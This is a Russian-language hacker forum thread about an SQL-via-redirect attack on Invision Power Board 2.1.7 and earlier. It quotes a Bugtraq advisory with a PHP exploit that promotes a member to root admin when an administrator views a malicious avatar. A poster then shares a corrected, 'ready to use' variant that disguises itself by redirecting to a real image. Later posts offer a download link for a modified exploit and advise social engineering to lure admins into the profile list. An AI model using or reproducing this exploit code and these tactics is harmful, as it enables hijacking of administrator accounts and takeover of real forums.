sql-inj в ipb <=2.1.7
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя |
Сообщение |
<< Старые топики Новые топики >> |
|
|
sql-inj в ipb <=2.1.7 - 2006-10-19 18:46:48.560000
|
|
|
KPOT_f!nd
Сообщений: 767
Оценки: 0
Присоединился: 2006-09-18 05:16:50.950000
|
Итак, в среду на багтраке появилось сообщение об уязвимости IPB <=2.1.7. Уязвимым оказался скрипт кп админки. Если поставить вместо ссылки на аватару ссылку на пхп-сплоит, то при просмотре админом (это должен быть рут-админ) акка пользователя через контрпанельку имеется возможность выполнить скуль-комманды через IPB's SQL Toolbox. quote:
From: Rapigator <rapigator_at_yahoo.com> Date: Wed, 4 Oct 2006 11:58:38 -0700 (PDT) Invision Power Board Multiple Vulnerabilities Affects: IPB <=2.1.7 Risk: High An attack exists where an admin can be redirected and forced to execute SQL commands through IPB's SQL Toolbox. The following requirements must be met for this attack to take place: - The database table prefix must be known - The admin must have access to the SQL Toolbox (any "root admin") - The admin must have images and referers turned on in their browser, and their browser must follow Location headers (default behaviour for most browsers) - The admin must view a malicious script as an image in their browser. This attack works invisibly to the admin because only the image is redirected, not the page. 1st method: In this method, any user can force the admin to execute SQL commands. 1. A user sets their avatar to the malicious script's address 2. The admin looks up the user's account in the Admin CP 3. The user's avatar is shown and the admin is redirected…. 2nd method: A restricted admin can add any HTML to a forum's description(including javascript). 1. A restricted admin adds the malicious script as an image to a forum's description. 2. Upon going to the "Manage Forums" link in Admin CP, an unrestricted admin will be redirected and the SQL will be executed. Example malicious image script: <?php //The member id to promote to root admin $mid = 145; //The database prefix (usually "ibf_") $prefix = "ibf_"; if (preg_match('/(.*adsess=[\\w]{32})/', $_SERVER['HTTP_REFERER'], $admin_loc) and $mid) { header("Location: ".$admin_loc[1]."&act=sql&code=runsql&query=UPDATE+{$prefix}members+SET+mgroup%3D4+where +id%3D{$mid}+LIMIT+1"); } ?> http://seclists.org/bugtraq/2006/Oct/0049.html Уязвимы версии: Invision Power Board 2.0.x Invision Power Board 2.1.0 - 2.1.7 Invision Power Board 2.2 Beta 1 Неуязвимы: Invision Power Board 2.1.7 (ID: 21013.61005.s) Invision Power Board 2.2 Beta 2 Делитесь тут мыслями по поводу этой баги. :@ZLOY
|
|
|
RE: sql-inj в ipb <=2.1.7 - 2006-10-19 18:50:32.213333
|
|
|
KPOT_f!nd
Сообщений: 767
Оценки: 0
Присоединился: 2006-09-18 05:16:50.950000
|
Разобрался я с этим експлойтом, прет кук из админпанели и добавляет к нему запрос сэквел, мне понравилось У кого что то не получается расскажу что нужно сделать чтобы получилось Как сделать чтобы скрыть под avatar.jpg пхп скрипт думаю ясно, но скопировав предоставленный эксплойт и даже подставив нужные значения, ничего не выйдет, там есть небольшая хитрость (может просто случайность) в строке: header("Location: ".$admin_loc[1]."&act=sql&code=runsql&query=UPDATE+{$prefix}members+SET+mgroup%3D4+where +id%3D{$mid}+LIMIT+1"); Нужно удалить лишний знак табуляции и выровнять строку так: header("Location: ".$admin_loc[1]."&act=sql&code=runsql&query=UPDATE+{$prefix}members+SET+mgroup%3D4+where +id%3D{$mid}+LIMIT+1"); Заодно предоставлю следующий вариант, чтобы у админов не вызывал подозрения не отображающийся аватар, допишем строчку в сплойт (сплойт готовый к употреблению): Это сам сплойт: <?php
$mid = 2;
if (preg_match('/(.*adsess=[\\w]{32})/', $_SERVER['HTTP_REFERER'], $admin_loc) and $mid)
{ header("Location: ".$admin_loc[1]."&act=sql&code=runsql&query=UPDATE+ibf_members+SET+posts%3D12897+WHERE+id%3D2"); }
else { header("Location: http://forum.xxx/forum/uploads/av-xx.jpg"); }
?> Тестировочный сплойт, который станавливает юзеру с id=2 количество постов 12897, чтобы получить права админа вставляем запрос из официального сплойта Сработает только тогда, когда админ посмотрит профиль юзера из Админпанели :D Если админ посмотри профиль в браузере konqueror вас ждет разочарование[&o] :@ZLOY
|
|
|
RE: sql-inj в ipb <=2.1.7 - 2006-10-19 19:00:14.460000
|
|
|
rtw
Сообщений: 1372
Оценки: 0
Присоединился: 2004-08-19 00:28:05
|
неплохо :) сыровато ещё правда, будем ждать в паблике приватных сплойтов 0)
|
|
|
RE: sql-inj в ipb <=2.1.7 - 2006-10-19 19:02:45.340000
|
|
|
KPOT_f!nd
Сообщений: 767
Оценки: 0
Присоединился: 2006-09-18 05:16:50.950000
|
хых) Я пробовал! Получилось! Только долго ждать! хыхы) :@ZLOY
|
|
|
RE: sql-inj в ipb <=2.1.7 - 2006-10-19 20:11:17.646666
|
|
|
Pupkin-Zade
Сообщений: 9398
Оценки: 1489
Присоединился: 2004-03-10 13:54:16
|
Ну так если админ занет - нахрен он будет смотреть профили юзера?
|
|
|
RE: sql-inj в ipb <=2.1.7 - 2006-10-19 20:30:27.733333
|
|
|
AdReNaL1Ne
Сообщений: 8027
Оценки: 350
Присоединился: 2005-09-11 06:38:05
|
Эта уязвимость была найдена две недели недели назад, аминь.
|
|
|
RE: sql-inj в ipb <=2.1.7 - 2006-10-19 20:52:37.903333
|
|
|
rtw
Сообщений: 1372
Оценки: 0
Присоединился: 2004-08-19 00:28:05
|
Главное что она Есть, это уже радует!!! А то вовсю заполняют рунет 7 ipb, а норм сплойтов в паблике то и нету :)
|
|
|
RE: sql-inj в ipb <=2.1.7 - 2006-10-20 19:38:18.836666
|
|
|
KPOT_f!nd
Сообщений: 767
Оценки: 0
Присоединился: 2006-09-18 05:16:50.950000
|
quote:
http://www.xakep.ru/post/34306/default.asp Invision Power Board 2.1.x там! :@ZLOY
|
|
|
RE: sql-inj в ipb <=2.1.7 - 2006-12-29 20:57:32.536666
|
|
|
2pick
Сообщений: 20
Оценки: 0
Присоединился: 2006-12-29 20:47:16.606666
|
Немного модифицировал эксплоит… Теперь он пополезнее стал. :) http://fun.nad1.ru/ipb_217_exploit.zip
|
|
|
RE: sql-inj в ipb <=2.1.7 - 2006-12-29 23:07:10.226666
|
|
|
MindGame
Сообщений: 765
Оценки: 0
Присоединился: 2006-08-21 18:53:44
|
quote:
ORIGINAL: 2pick Немного модифицировал эксплоит… Теперь он пополезнее стал. :) http://fun.nad1.ru/ipb_217_exploit.zip ну ты ващеее красавчиг, щас обязательно скачаю, зацению твое творение
|
|
|
RE: sql-inj в ipb <=2.1.7 - 2006-12-30 09:50:33.656666
|
|
|
2pick
Сообщений: 20
Оценки: 0
Присоединился: 2006-12-29 20:47:16.606666
|
И чё как оно? :)
|
|
|
RE: sql-inj в ipb <=2.1.7 - 2006-12-30 11:02:55.053333
|
|
|
KPOT_f!nd
Сообщений: 767
Оценки: 0
Присоединился: 2006-09-18 05:16:50.950000
|
quote:
И чё как оно? :) номанО! пойдеТ! :@ZLOY
|
|
|
RE: sql-inj в ipb <=2.1.7 - 2007-01-03 09:02:41.696666
|
|
|
Xray
Сообщений: 1
Оценки: 0
Присоединился: 2007-01-03 08:57:22.270000
|
quote:
Немного модифицировал эксплоит… Теперь он пополезнее стал. :) http://fun.nad1.ru/ipb_217_exploit.zip И как этим пользоваться скажите мне.
|
|
|
RE: sql-inj в ipb <=2.1.7 - 2007-01-03 11:18:42.410000
|
|
|
Ded MustD!e
Сообщений: 567
Оценки: 0
Присоединился: 2006-07-23 17:19:08
|
quote:
ORIGINAL: Xray quote:
Немного модифицировал эксплоит… Теперь он пополезнее стал. :) http://fun.nad1.ru/ipb_217_exploit.zip И как этим пользоваться скажите мне. бугагага распечатай и положи в холодильник…
|
|
|
RE: sql-inj в ipb <=2.1.7 - 2007-01-03 11:33:50.483333
|
|
|
Greaves
Сообщений: 2167
Оценки: 0
Присоединился: 2006-07-04 19:50:46
|
….пацталом…:D:D:D 2Xray, ты бы хоть про баг сначала почитал, а потом уж к эксплоиту лез
|
|
|
RE: sql-inj в ipb <=2.1.7 - 2007-01-03 15:10:49.250000
|
|
|
2pick
Сообщений: 20
Оценки: 0
Присоединился: 2006-12-29 20:47:16.606666
|
2Xray: Гыг. Может тебе описание сплойта ещё вылложить?
|
|
|
RE: sql-inj в ipb <=2.1.7 - 2007-01-06 05:07:38.423333
|
|
|
Pirate
Сообщений: 2
Оценки: 0
Присоединился: 2007-01-02 03:03:42.200000
|
Почитал я про баг. Понял, что беда будет в том, чтобы админ залез в мой профиль. А на черта ему это :@ На форумах по нескольку тысяч зарегеных пользователей и сколько ждать, пока админ зайдёт в профиль каждого? Если я не прав - объясните, как надо и за одно скажите, чем этот сплойт компилировать.
|
|
|
RE: sql-inj в ipb <=2.1.7 - 2007-01-06 10:00:14.663333
|
|
|
ZneP
Сообщений: 910
Оценки: 0
Присоединился: 2006-08-21 16:11:47
|
а ты заставь админа зайти в твой профиль, скажи что у тебя не открывается профиль или скажи что там хз что творится…
|
|
|
RE: sql-inj в ipb <=2.1.7 - 2007-01-06 15:08:17.693333
|
|
|
MindGame
Сообщений: 765
Оценки: 0
Присоединился: 2006-08-21 18:53:44
|
quote:
ORIGINAL: 2pick И чё как оно? :) хз, я так прикололся… а ты надеялся, что я скачаю сплойт с какой левой ссылки и запущу? Ну ты красавчеГ бугага;)
|
|
|
RE: sql-inj в ipb <=2.1.7 - 2007-01-06 15:12:50.996666
|
|
|
Greaves
Сообщений: 2167
Оценки: 0
Присоединился: 2006-07-04 19:50:46
|
quote:
ORIGINAL: ZneP а ты заставь админа зайти в твой профиль, скажи что у тебя не открывается профиль или скажи что там хз что творится… Вот-вот, Социальная инженерия рулит……а если не знаешь что это такое гугл тебе в помощь
|
|
|
RE: sql-inj в ipb <=2.1.7 - 2007-01-06 19:04:32.390000
|
|
|
2pick
Сообщений: 20
Оценки: 0
Присоединился: 2006-12-29 20:47:16.606666
|
quote:
ORIGINAL: MindGame quote:
ORIGINAL: 2pick И чё как оно? :) хз, я так прикололся… а ты надеялся, что я скачаю сплойт с какой левой ссылки и запущу? Ну ты красавчеГ бугага;) Ну ты мудила. :))) Тебе легче станет, если я на народ плешивый залью или чё? Просто сервак есть у меня. Если бы можно было прикреплять сюда, я бы прикрепил.
|
|
|
RE: sql-inj в ipb <=2.1.7 - 2007-01-06 19:07:34.066666
|
|
|
2pick
Сообщений: 20
Оценки: 0
Присоединился: 2006-12-29 20:47:16.606666
|
Не обязательно смотреть конкретно твой прифиль, будет даже достаточно, если он попадёт в список профилей по запросу админа, к примеру у меня ник 2pick, он будет искать 2* вот тебе пожалуйсто. Сплойт сработает, т.к. по дефолту в списке профилей, подгружаются аватары, а этого вполне достаточно.
|
|
|
RE: sql-inj в ipb <=2.1.7 - 2007-01-17 04:01:37.010000
|
|
|
Float
Сообщений: 1
Оценки: 0
Присоединился: 2007-01-17 03:59:31.946666
|
quote:
Как сделать чтобы скрыть под avatar.jpg пхп скрипт думаю ясно Скинь ссылочку с обьяснением плз. А то чёта не нашёл нигде.
|
|
|
|
|